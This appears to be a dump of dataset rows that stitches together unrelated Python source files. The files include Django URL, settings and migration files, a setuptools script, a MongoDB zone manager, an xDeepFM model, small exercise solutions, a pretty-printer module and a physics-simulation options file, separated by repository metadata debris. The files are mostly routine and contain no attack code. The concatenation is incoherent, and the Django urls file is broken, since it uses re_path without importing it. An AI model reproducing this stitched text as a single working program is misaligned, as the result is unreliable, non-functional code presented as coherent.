from django.conf.urls import url
from . import views
# TEMPLATE TAGGING: app_name enables namespaced URL reversing, e.g. {% url 'first_app:other' %}
app_name = 'first_app'
urlpatterns = [
re_path(r'^index/', views.index, name=''),
re_path(r'formindex/',views.form_name_view,name='form_name'),
re_path(r'^relative/$',views.relative,name = 'relative'),
re_path(r'^other/$',views.other,name='other'),
re_path(r'^register/$',views.register,name='register'),
re_path(r'^user_login/$',views.user_login,name='user_login')
] | [
"[email protected]"
] | |
7e5fc8246ba12f67b9efe8fe1433a80bbd6460fe | d4fe66ef7b5bc1745aeb4054b30575fb25a053f4 | /setup.py | d838e226a7de7b9cd782061fb6f64b3134bc06cc | [
"Apache-2.0"
] | permissive | jay-johnson/antinex-client | 796c753bc9df8498f25dca994920b26d8828a940 | 76a3cfbe8a8d174d87aba37de3d8acaf8c4864ba | refs/heads/master | 2021-04-15T15:55:39.670061 | 2020-09-04T19:49:15 | 2020-09-04T19:49:15 | 126,577,469 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,053 | py | import os
import sys
import warnings
import unittest
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
user_options = [('pytest-args=', 'a', "Arguments to pass to pytest")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = ''
def run_tests(self):
import shlex
# import here, cause outside the eggs aren't loaded
import pytest
errno = pytest.main(shlex.split(self.pytest_args))
sys.exit(errno)
"""
https://packaging.python.org/guides/making-a-pypi-friendly-readme/
check the README.rst works on pypi as the
long_description with:
twine check dist/*
"""
long_description = open('README.rst').read()
cur_path, cur_script = os.path.split(sys.argv[0])
os.chdir(os.path.abspath(cur_path))
install_requires = [
"colorlog",
"coverage",
"flake8",
"matplotlib",
"numpy",
"pandas",
"pep8",
"pipenv",
"pycodestyle",
"pylint",
"recommonmark",
"requests",
"seaborn",
"sphinx",
"sphinx-autobuild",
"sphinx_rtd_theme",
"spylunking",
"tox",
"tqdm",
"unittest2",
"mock"
]
if sys.version_info < (3, 5):
warnings.warn(
"Less than Python 3.5 is not supported.",
DeprecationWarning)
# Do not import antinex_client module here, since deps may not be installed
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "antinex_client"))
setup(
name="antinex-client",
cmdclass={"test": PyTest},
version="1.3.6",
description=("AntiNex Python client"),
long_description_content_type='text/x-rst',
long_description=long_description,
author="Jay Johnson",
author_email="[email protected]",
url="https://github.com/jay-johnson/antinex-client",
packages=[
"antinex_client",
"antinex_client.scripts",
"antinex_client.log"
],
package_data={},
install_requires=install_requires,
test_suite="setup.antinex_client_test_suite",
tests_require=[
"pytest"
],
scripts=[
"./antinex_client/scripts/ai",
"./antinex_client/scripts/ai_env_predict.py",
"./antinex_client/scripts/ai_get_prepared_dataset.py",
"./antinex_client/scripts/ai_get_job.py",
"./antinex_client/scripts/ai_get_results.py",
"./antinex_client/scripts/ai_prepare_dataset.py",
"./antinex_client/scripts/ai_train_dnn.py"
],
use_2to3=True,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
])
| [
"[email protected]"
] | |
63f124f199d2e152e2fc67618693c424f3febbb7 | d458b72b4d0e5c51446bb8b9f8a6276015dfb594 | /math/0x02-calculus/10-matisse.py | 88cf330d9c797d23e8f981fda83e54f60879e7f5 | [] | no_license | mecomontes/Machine-Learning-projects | d6588cfaa7d020d3fae0fb74f6550c9e84500578 | 50e1828b58bb58eecfd3a142501b37fe701f4e49 | refs/heads/main | 2023-07-14T12:30:19.792332 | 2021-08-29T15:33:16 | 2021-08-29T15:33:16 | 376,129,791 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 808 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 8 9:34:16 2020
@author: Robinson Montes
"""
def poly_derivative(poly):
"""
    Function that finds the derivative of a polynomial
    Arguments:
     - poly (list of integers): coefficients of the polynomial to differentiate
Return:
List of coefficients representing the derivative of the polynomial
"""
if poly is None or poly == [] or type(poly) is not list:
return None
derivate = []
i = 0
while i < len(poly):
if type(poly[i]) not in (int, float):
return None
elif len(poly) == 1:
derivate.append(0)
else:
if i == 0:
i += 1
continue
derivate.append(poly[i]*i)
i += 1
return derivate
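if __name__ == "__main__":
    # Quick illustrative check (added, not part of the original exercise):
    # p(x) = 5 + 3x + x^2  ->  p'(x) = 3 + 2x
    print(poly_derivative([5, 3, 1]))  # expected: [3, 2]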
| [
"[email protected]"
] | |
b49d41c660d323470c0b91f8b0625757281eccd0 | 1be96ee96f3b33469ca073c4f32884cb7230106b | /python3_cron_scripts/libs3/ZoneManager.py | 0531dbedb4a08f885bbf76e4b6fa355e672c65fc | [
"Apache-2.0"
] | permissive | vishnurajkv/Marinus | 3305478038fba8b0ea15dafa2219df9f4df21e9b | 331ba1dc2e99ae99df6c9d93063a852eec41d578 | refs/heads/master | 2020-06-29T10:58:50.196807 | 2019-07-26T20:48:47 | 2019-07-26T20:48:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,583 | py | #!/usr/bin/python3
# Copyright 2018 Adobe. All rights reserved.
# This file is licensed to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may obtain a copy
# of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
"""
This class mostly exists because almost every script needs to call get_distinct_zones.
Having it centralized means that the included and excluded statuses can be managed in one place.
"""
from pymongo import MongoClient
from datetime import datetime
from tld import get_fld
class ZoneManager(object):
# A status of confirmed typically means it was entered by a human
CONFIRMED = "confirmed"
# A status of unconfirmed means that it was added via automation
    # It has not been reviewed by a human
UNCONFIRMED = "unconfirmed"
# A status of false positive means that a human identified that automation made a mistake
FALSE_POSITIVE = "false_positive"
# A status of expired means that the automation believes that the domain is no longer registered
EXPIRED = "expired"
# The MongoConnector
mongo_connector = None
# The zone collection
zone_collection = None
def __init__(self, mongo_connector):
"""
Initialize the MongoDB Connector
"""
self.mongo_connector = mongo_connector
self.zone_collection = mongo_connector.get_zone_connection()
def _check_valid_status(self, status):
if status != ZoneManager.EXPIRED and status != ZoneManager.FALSE_POSITIVE and \
status != ZoneManager.CONFIRMED and status!= ZoneManager.UNCONFIRMED:
print("ERROR: Bad status value")
return False
return True
@staticmethod
def get_distinct_zones(mongo_connector, includeAll = False):
"""
This is the most common usage of get zones where the caller wants just the list of
active zones.
This returns the list of zones as an array of strings rather than the complete JSON objects
"""
zones_collection = mongo_connector.get_zone_connection()
if includeAll:
zone_results = mongo_connector.perform_distinct(zones_collection, 'zone')
else:
zone_results = mongo_connector.perform_distinct(zones_collection, 'zone', {'status': {"$nin": [ZoneManager.FALSE_POSITIVE, ZoneManager.EXPIRED]}})
zones = []
for zone in zone_results:
if zone.find(".") >= 0:
zones.append(zone)
return zones
@staticmethod
def get_reversed_zones(mongo_connector):
"""
Retrieve the list of active zones and then reverse them to match the Common Crawl format
"""
zones_collection = mongo_connector.get_zone_connection()
zone_results = mongo_connector.perform_distinct(zones_collection, 'zone', {'status': {"$nin": [ZoneManager.FALSE_POSITIVE, ZoneManager.EXPIRED]}})
zones = []
for zone in zone_results:
if zone.find("."):
zone_parts = zone.split(".")
# The vertices.txt entries from common_crawl are in reverse order (e.g. org.example.www)
# To string match faster, the zones are stored in a reverse format prior to matching.
# This avoids having to reverse each entry in the file which is less efficient.
rev_zone = ""
for part in zone_parts:
rev_zone = part + "." + rev_zone
rev_zone = rev_zone[:-1]
zones.append(rev_zone)
return zones
@staticmethod
def get_zones_by_source(mongo_connector, source, includeAll=False):
"""
Returns a list of zones based on the provided reporting source
"""
zone_collection = mongo_connector.get_zone_connection()
if includeAll:
zones = mongo_connector.perform_distinct(zone_collection, 'zone', {
'reporting_sources.source': source})
else:
zones = mongo_connector.perform_distinct(zone_collection, 'zone', {
'reporting_sources.source': source,
'status': {'$nin': [ZoneManager.FALSE_POSITIVE, ZoneManager.EXPIRED]}})
return zones
@staticmethod
def get_zones(mongo_connector, includeAll=False):
"""
        This will return the full zone objects for all active zones.
This returns the complete json objects for the matching descriptions
"""
zones_collection = mongo_connector.get_zone_connection()
if includeAll:
zone_results = mongo_connector.perform_find(zones_collection, {})
else:
zone_results = mongo_connector.perform_find(zones_collection, {'status': {"$nin": [ZoneManager.FALSE_POSITIVE, ZoneManager.EXPIRED]}})
zones = []
for zone in zone_results:
if zone['zone'].find(".") >= 0:
zones.append(zone)
return zones
@staticmethod
def get_root_domain(value, zone=None):
"""
Get the root domain (FLD) for the provided value
"""
res = get_fld(value, fix_protocol=True, fail_silently=True)
if res is None:
return zone
return res
def get_zone(self, zone):
"""
Fetch the full individual zone record.
This is not a staticmethod since it would probably be called repeatedly.
"""
return self.mongo_connector.perform_find(self.zone_collection, {'zone': zone})
def get_zones_by_status(self, status):
"""
This returns the list of zones associated with the provided status.
This returns the list of zones as an array of strings rather than the complete JSON objects
"""
if not self._check_valid_status(status):
return
zone_results = self.mongo_connector.perform_distinct(self.zone_collection, 'zone', {'status': status})
zones = []
for zone in zone_results:
if zone.find(".") >= 0:
zones.append(zone)
return zones
def set_status(self, zone, status, caller):
"""
        Set the status of a zone (confirmed, unconfirmed, expired, or false_positive).
"""
if self.zone_collection.find({'zone': zone}).count() == 0:
print("ERROR: Invalid zone!")
return
if status != ZoneManager.EXPIRED and status != ZoneManager.FALSE_POSITIVE and \
status != ZoneManager.CONFIRMED and status!= ZoneManager.UNCONFIRMED:
print("ERROR: Bad status value!")
return
if caller is None or caller == "":
print("ERROR: Please provide a caller value!")
return
now = datetime.now()
note = caller + " set to " + status + " on " + str(now)
self.zone_collection.update({"zone": zone}, {"$set": {"status": status, "updated": now}, "$addToSet": {"notes": note}})
def add_note(self, zone, note):
"""
In the future, there should probably be restrictions on note length.
For now, it is not set until more information on usage is available.
"""
self.zone_collection.update({"zone": zone}, {"$addToSet": {"notes": note}})
| [
"[email protected]"
] | |
33302759c219b9a3b1fe2347ecb502a4dace1d4d | fc0150b1fd6ba0efd6746a34ffa8cba01640d10e | /Programming Basics with Python - април 2018/04. Complex-Conditions/02. Small Shop.py | f98d0d795257e24d58dfce9db983b1cd9ca6dbeb | [] | no_license | vgrozev/SofUni_Python_hmwrks | 7554d90f93b83d58e386c92dac355573c8cda848 | b10a941a0195ea069e698b319f293f5b4a660547 | refs/heads/master | 2021-06-08T19:40:27.009205 | 2019-11-24T17:19:31 | 2019-11-24T17:19:31 | 95,629,443 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,132 | py | product = input().lower()
town = input().lower()
quantity = float(input())
total = 0.0
if town == 'sofia':
if product == 'coffee':
total = quantity * 0.50
elif product == 'peanuts':
total = quantity * 1.60
elif product == 'beer':
total = quantity * 1.20
elif product == 'water':
total = quantity * 0.80
else: # product == 'sweets'
total = quantity * 1.45
elif town == 'plovdiv':
if product == 'coffee':
total = quantity * 0.40
elif product == 'peanuts':
total = quantity * 1.50
elif product == 'beer':
total = quantity * 1.15
elif product == 'water':
total = quantity * 0.70
else: # product == 'sweets'
total = quantity * 1.30
else: # town == 'Varna'
if product == 'coffee':
total = quantity * 0.45
elif product == 'peanuts':
total = quantity * 1.55
elif product == 'beer':
total = quantity * 1.10
elif product == 'water':
total = quantity * 0.70
else: # product == 'sweets'
total = quantity * 1.35
print("{0:.2f}".format(total))
| [
"[email protected]"
] | |
2d6e5705b0d6fc9452a7eef4f715005355db0acf | 0067290f8a2c5c367eee2e76f7ec743719d5b59c | /one/two/migrations/0002_auto_20170802_1924.py | 02ba77ac66799d0a3867254c03ad5115c12deb5d | [] | no_license | 8880/Django | d81da8f410845676606eb148a609f56792a14b1b | 469fe07475c2f7c6e2d1ba1e2119b59550f154e6 | refs/heads/master | 2021-01-16T17:54:58.393384 | 2017-08-19T02:55:11 | 2017-08-19T02:55:11 | 100,019,134 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,264 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-02 11:24
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('two', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField(verbose_name='\u8bc4\u8bba\u5185\u5bb9')),
('username', models.CharField(blank=True, max_length=30, null=True, verbose_name='\u7528\u6237\u540d')),
('email', models.EmailField(blank=True, max_length=50, null=True, verbose_name='\u90ae\u7bb1\u5730\u5740')),
('url', models.URLField(blank=True, max_length=100, null=True, verbose_name='\u4e2a\u4eba\u7f51\u9875\u5730\u5740')),
('date_publish', models.DateTimeField(auto_now_add=True, verbose_name='\u53d1\u5e03\u65f6\u95f4')),
],
options={
'verbose_name': '\u8bc4\u8bba',
'verbose_name_plural': '\u8bc4\u8bba',
},
),
migrations.AlterModelOptions(
name='article',
options={'ordering': ['-id'], 'verbose_name': '\u6587\u7ae0', 'verbose_name_plural': '\u6587\u7ae0'},
),
migrations.AddField(
model_name='comment',
name='article',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='two.Article', verbose_name='\u6587\u7ae0'),
),
migrations.AddField(
model_name='comment',
name='pid',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='two.Comment', verbose_name='\u7236\u7ea7\u8bc4\u8bba'),
),
migrations.AddField(
model_name='comment',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='\u7528\u6237'),
),
]
| [
"klous530.outlook.com"
] | klous530.outlook.com |
a4e3c2a78a101ae2c35ecf31315de44d777b253f | 89cd8b77ad5171c336cc60b2133fe6468a6cb53f | /Module01_CZ/day7_data_struct_str/04-代码/day7/125_字符串高级操作(判断型).py | 8f356536eabd5e44cafbc8624e413494095895a0 | [
"MIT"
] | permissive | fenglihanxiao/Python | 75178f6b6b0c53345e1ed54226ea645216572d6c | 872baf3a3a5ee42740161152605ca2b1ddf4cd30 | refs/heads/master | 2021-05-23T18:49:20.656433 | 2020-04-29T01:06:21 | 2020-04-29T01:06:21 | 253,199,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | py | """
Demonstrates string predicate ("judgment-style") operations
"""
# str1 = "\n"
# print(str1.islower())
# print(str1.isupper())
name = "张三丰"
print(name.startswith("张三"))
filename="1.jpge"
if filename.endswith(".jpg") or filename.endswith(".png") :
print("该文件是一个图片")
| [
"[email protected]"
] | |
a268ef38a2861b114ef4f65c5e31730ade40cc92 | 7f68bbb3fd328a4d6bbabecb44305987d8cbbfc4 | /django/django-intro/home/workspace/PROJECT8/movies/forms.py | 96b211b33850d9d51473be7e05a26ff57cb8c511 | [] | no_license | seunghoon2334/TIL | c84f9f9e68c8ccc7a1625222fe61f40739774730 | 51cfbad2d9b80a37b359716fca561c2a5c5b48b3 | refs/heads/master | 2022-12-18T18:20:19.210587 | 2019-11-26T03:14:23 | 2019-11-26T03:14:23 | 162,101,369 | 0 | 0 | null | 2022-11-22T03:59:16 | 2018-12-17T08:51:53 | C | UTF-8 | Python | false | false | 491 | py | from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from .models import Movie
# modelform
class MovieForm(forms.ModelForm):
class Meta:
model = Movie
fields = '__all__'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_method = 'POST'
        self.helper.add_input(Submit('Submit', 'Submit!'))  # label translated from Korean '제출!' | [
"[email protected]"
] | |
5837d24747eb111593c4fdc4fdb16c2048efb91e | d3e6d6555b0314936902727af36de2f1b7432bf8 | /linked-list-cycle/linked-list-cycle.py | af4d1032682c25c061b7019097dc1288fceab653 | [] | no_license | fly2rain/LeetCode | 624b1e06e1aa3174dfb5c81834b58cc8fd7ad073 | 4ddb5a051c6e2051f016a675fd2f5d566c800c2a | refs/heads/master | 2021-01-18T03:12:22.402044 | 2015-12-28T04:31:19 | 2015-12-28T04:31:19 | 85,842,050 | 0 | 1 | null | 2017-03-22T15:05:20 | 2017-03-22T15:05:19 | null | UTF-8 | Python | false | false | 771 | py |
from utils import ListNode
class Solution(object):
def hasCycle(self, head):
"""
:type head: ListNode
:rtype: bool
"""
if not head:
return False
        # Reverse the list while traversing it; in a cyclic list the reversed
        # links eventually lead back to the original head. NOTE: destructive.
        prev, current = head, head.next
head.next = None
while current:
if current == head:
return True
            next_node = current.next  # renamed from 'next' to avoid shadowing the builtin
            current.next = prev
            prev, current = current, next_node
return False
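def has_cycle_floyd(head):
    # Added sketch (not from the original solution): Floyd's tortoise-and-hare
    # detection. Unlike the reversal trick above, it does not mutate the list.
    slow = fast = head
    while fast and fast.next:
        slow = slow.next
        fast = fast.next.next
        if slow is fast:
            return True
    return False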
if __name__ == '__main__':
head = ListNode.build_linked_list([1, 2, 3, 4, 5])
head.next.next.next.next = head.next.next
print Solution().hasCycle(head)
head2 = ListNode.build_linked_list([1, 2, 3, 4, 5])
print Solution().hasCycle(head2)
print Solution().hasCycle(None) | [
"[email protected]"
] | |
d313ac27c05892907d934359fa7a177b2f5f2fff | 633944f913050debf0764c2a29cf3e88f912670e | /v8/depot_tools/bootstrap-3.8.0b1.chromium.1_bin/python3/lib/python3.8/site-packages/pip/_internal/vcs/__init__.py | 4b25ec2e4255710878140a71bd637c31b9cea887 | [
"BSD-3-Clause",
"bzip2-1.0.6",
"SunPro",
"Apache-2.0"
] | permissive | bopopescu/V8-lgtm | 0474c2ff39baf754f556ef57619ceae93e7320fd | da307e2f7abfca5fa0e860a809de6cd07fd1b72b | refs/heads/master | 2022-02-16T19:10:54.008520 | 2019-09-25T07:51:13 | 2019-09-25T07:51:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | ../../../../../../../.cipd/pkgs/2/_current/lib/python3.8/site-packages/pip/_internal/vcs/__init__.py | [
"[email protected]"
] | |
31a9922a9cadf18a73fa0c106cd377bfb6696751 | 08a68e32dc80f99a37a30ddbbf943337546cc3d5 | /.history/count/urls_20200419191412.py | 5d8ed271bfc7e1cb0268e075f7a2e8934d978eed | [] | no_license | Space20001/word-count-project | dff1b4b44d2f7230070eef0d95dd968b655d92f7 | 795b5e8ad5c59109e96bf7a8e9192efaefa7770e | refs/heads/master | 2022-04-20T17:54:05.511449 | 2020-04-20T15:25:46 | 2020-04-20T15:25:46 | 257,327,368 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 132 | py | from django.urls import path
from . import views
urlpatterns = [
path('', views.home),
    # NOTE: this second '' route is shadowed by the identical route above and never matches.
    path('', views.about),
]
| [
"[email protected]"
] | |
d3ef5ccaa99988559bd5fde97a0082c970a270a1 | 1548ce77537dcd50ab04b0eaee050b5d30553e23 | /autotabular/algorithms/ctr/xdfm.py | 003e7cba0a5433e271cb0403bed753da731ebcad | [
"Apache-2.0"
] | permissive | Shamoo100/AutoTabular | 4a20e349104246bf825ebceae33dca0a79928f2e | 7d71bf01d2b7d84fcf5f65c9f45c5cea1255d8a2 | refs/heads/main | 2023-08-13T21:34:34.329888 | 2021-10-02T07:06:00 | 2021-10-02T07:06:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,338 | py | import torch
from autotabular.algorithms.ctr.layer import CompressedInteractionNetwork, FeaturesEmbedding, FeaturesLinear, MultiLayerPerceptron
class ExtremeDeepFactorizationMachineModel(torch.nn.Module):
"""A pytorch implementation of xDeepFM.
Reference:
J Lian, et al. xDeepFM: Combining Explicit and Implicit Feature Interactions for Recommender Systems, 2018.
"""
def __init__(self,
field_dims,
embed_dim,
mlp_dims,
dropout,
cross_layer_sizes,
split_half=True):
super().__init__()
self.embedding = FeaturesEmbedding(field_dims, embed_dim)
self.embed_output_dim = len(field_dims) * embed_dim
self.cin = CompressedInteractionNetwork(
len(field_dims), cross_layer_sizes, split_half)
self.mlp = MultiLayerPerceptron(self.embed_output_dim, mlp_dims,
dropout)
self.linear = FeaturesLinear(field_dims)
def forward(self, x):
"""
:param x: Long tensor of size ``(batch_size, num_fields)``
"""
embed_x = self.embedding(x)
x = self.linear(x) + self.cin(embed_x) + self.mlp(
embed_x.view(-1, self.embed_output_dim))
return torch.sigmoid(x.squeeze(1))
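if __name__ == '__main__':
    # Illustrative smoke test (added; not in the original module). The
    # field_dims and layer sizes are made up, and it assumes the autotabular
    # package is importable so the layer imports above resolve.
    model = ExtremeDeepFactorizationMachineModel(
        field_dims=[10, 20, 30], embed_dim=16, mlp_dims=(32, 16),
        dropout=0.2, cross_layer_sizes=(16, 16))
    x = torch.randint(0, 10, (4, 3)).long()  # batch of 4 rows, 3 categorical fields
    print(model(x).shape)  # expected: torch.Size([4])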
| [
"[email protected]"
] | |
ba4a59497f41ffefe8c698f0a65012b2d35d88e6 | b5aeb0f8b8efc77d77842237a80cce90e529ac5f | /config/settings.py | 04b0faaaab467f76b64edc86c9631e42ab3f4de5 | [] | no_license | Pillin/POC-Django-Cooker | b078502d403a90cc57c4691265235ce855c8d75e | e6ad88564d3045af4a418234a927970f928e3c58 | refs/heads/master | 2022-12-12T15:02:41.410674 | 2019-09-30T03:41:28 | 2019-09-30T03:41:28 | 210,078,139 | 1 | 0 | null | 2022-12-08T05:22:06 | 2019-09-22T02:13:33 | Python | UTF-8 | Python | false | false | 4,361 | py | """
Django settings for nora project.
Generated by 'django-admin startproject' using Django 2.2.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ENV = environ.Env()
ENV.read_env(os.path.join(BASE_DIR, '.env'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ENV('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = ENV('DEBUG')
ALLOWED_HOSTS = []
BASE_URL = ENV('BASE_URL')
# Application definition
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'django_extensions',
'users',
'commons',
'meals',
'tags',
'plates',
'menus',
'distributions',
'deliveries'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework_jwt.authentication.JSONWebTokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.BasicAuthentication',
),
}
# Authentication Settings
AUTH_USER_MODEL = 'users.User'
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
]
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': ENV.db()
}
DATABASES['default']['TEST'] = {
'NAME': 'nora_test'
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'es-cl'
TIME_ZONE = 'Etc/GMT+4'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
CSRF_USE_SESSIONS = True
STATIC_URL = '/static/'
LOGIN_REDIRECT_URL = '/home/'
LOGIN_URL = '/login/'
CSRF_COOKIE_SECURE = True
DATE_FORMAT = '%d/%m/%Y'
TIME_FORMAT = '%H:%M:%S'
SLACK_SERVICE_URL = 'https://hooks.slack.com/services/'
# CELERY CONFIGURATION
BROKER_URL = 'redis://localhost:6379'
CELERY_RESULT_BACKEND = 'redis://localhost:6379'
CELERY_ACCEPT_CONTENT = ['application/json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_TIMEZONE = 'Etc/GMT+4'
CELERY_ALWAYS_EAGER = False
| [
"[email protected]"
] | |
e569fc7fc6e893e1d228b1d7e4971dcb65008fb8 | 45cc3880f3444276cebb0a7f91d3b146cd27b9d0 | /beeprint/printer.py | 63fe4de1510c7695ba066e8687e34780d93a7b3e | [] | no_license | aijikl/beeprint | 056aa84ff73da93c50143c83bed0fdf54bd37ee5 | 0380a942c0ad56ab219a51c728b4244a9b49f405 | refs/heads/master | 2021-01-20T04:25:26.858124 | 2017-04-04T06:50:36 | 2017-04-04T06:50:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,603 | py | # -*- coding:utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import division
import sys
import traceback
import types
import inspect
from io import StringIO
from .utils import pyv
if pyv == 2:
# avoid throw [UnicodeEncodeError: 'ascii' codec can't encode characters]
# exceptions, without these lines, the sys.getdefaultencoding() returns ascii
from imp import reload
reload(sys)
sys.setdefaultencoding('utf-8')
from . import constants as C
from .utils import print_exc_plus
from .models.block import Block, Context
from .config import Config
from .debug_kit import print_obj_path
def pp(o, output=True, max_depth=5, indent=2, width=80, sort_keys=True, config=None, **kwargs):
"""print data beautifully
"""
if config:
config = config.clone()
else:
config = Config()
assert max_depth > 0
config.max_depth = max_depth
assert indent > 0
config.indent_char = u' '*indent
assert width >= 0
config.string_break_width = width
config.dict_ordered_key_enable = bool(sort_keys)
    for k, v in kwargs.items():
        # forward only kwargs that name existing Config attributes
        # (was `if getattr(config, k)`, which skipped falsy settings and
        # raised AttributeError for unknown keys)
        if hasattr(config, k):
            setattr(config, k, v)
if not output:
config.stream = None
try:
res = str(Block(config, Context(obj=o)))
except:
print_obj_path()
raise
if config.debug_level != 0:
if config.debug_delay:
print(config.debug_stream.getvalue())
if not output:
return res
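# Illustrative usage sketch (added; assumes the installed beeprint package):
#   from beeprint import pp
#   pp({'name': 'x', 'values': [1, 2, 3]})     # pretty-prints to stdout
#   s = pp({'a': 1}, output=False)             # returns the string instead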
| [
"[email protected]"
] | |
fcaf8123dd2fd421f5fc4ee011401898730fd1c1 | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r10p1/Gen/DecFiles/options/11114095.py | 04981cbb389888968150d038dc6a792df1581176 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,637 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/11114095.py generated: Wed, 25 Jan 2017 15:25:18
#
# Event Type: 11114095
#
# ASCII decay Descriptor: [B0 -> K+ pi- (Higgs0 -> mu+ mu-)]cc
#
from Configurables import Generation
Generation().EventType = 11114095
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bd_KpiDarkBoson2MuMu,m=250MeV,t=100ps,DecProdCut.dec"
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
Generation().SignalRepeatedHadronization.SignalPIDList = [ 511,-511 ]
from Gauss.Configuration import *
from Configurables import LHCb__ParticlePropertySvc as ParticlePropertySvc
from Configurables import Gauss, PrintMCTree, PrintMCDecayTreeTool, HistogramPersistencySvc, NTupleSvc, DumpHepMCDecay, DumpHepMCTree, GaussMonitor__CheckLifeTimeHepMC, GaussMonitor__CheckLifeTimeMC, GiGa, GiGaPhysListModular, GiGaHiggsParticles, GenerationToSimulation, PythiaProduction
